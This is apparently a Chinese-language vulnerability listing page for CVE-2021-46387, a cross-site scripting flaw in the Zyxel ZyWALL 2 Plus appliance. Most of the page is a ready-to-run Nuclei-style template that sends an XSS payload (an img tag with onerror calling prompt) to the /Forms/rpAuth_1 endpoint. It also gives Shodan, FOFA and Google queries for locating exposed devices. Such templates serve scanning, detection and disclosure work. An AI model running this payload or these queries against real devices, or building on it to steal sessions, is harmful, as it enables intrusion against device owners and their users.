CVE-2021-46387: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Zyxel ZyWALL 2 Plus Internet Security Appliance | POC: 已公开

漏洞描述

ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.

PoC代码[已公开]

id: CVE-2021-46387

info:
  name: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting
  author: DhiyaneshDk
  severity: medium
  description: ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/50797
    - https://www.zyxel.com/us/en/support/security_advisories.shtml
    - https://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharing
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46387
    - https://www.zyxel.com/uk/en/products_services/zywall_2_plus.shtml
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-46387
    cwe-id: CWE-79
    epss-score: 0.28486
    epss-percentile: 0.96369
    cpe: cpe:2.3:o:zyxel:zywall_2_plus_internet_security_appliance_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zyxel
    product: zywall_2_plus_internet_security_appliance_firmware
    shodan-query:
      - http.title:"Zywall2Plus"
      - http.title:"zywall2plus"
    fofa-query: title="zywall2plus"
    google-query: intitle:"zywall2plus"
  tags: cve2021,cve,xss,zyxel,edb

http:
  - method: GET
    path:
      - '{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror="prompt(document.domain)"><form>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<iMg src=x onerror="prompt(document.domain)"><form>'
          - 'Entry Error'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205d3603c5d57a8da59f93d70b2a883165933aad8b0a7dd7fe5dc4c3b94bb47128022100832a0cef24c199eca0800cfacb91866f14f8e97ee79bc9809cb869c693effdbe:922c64590222798bb761d5b6d8e72950

相关漏洞推荐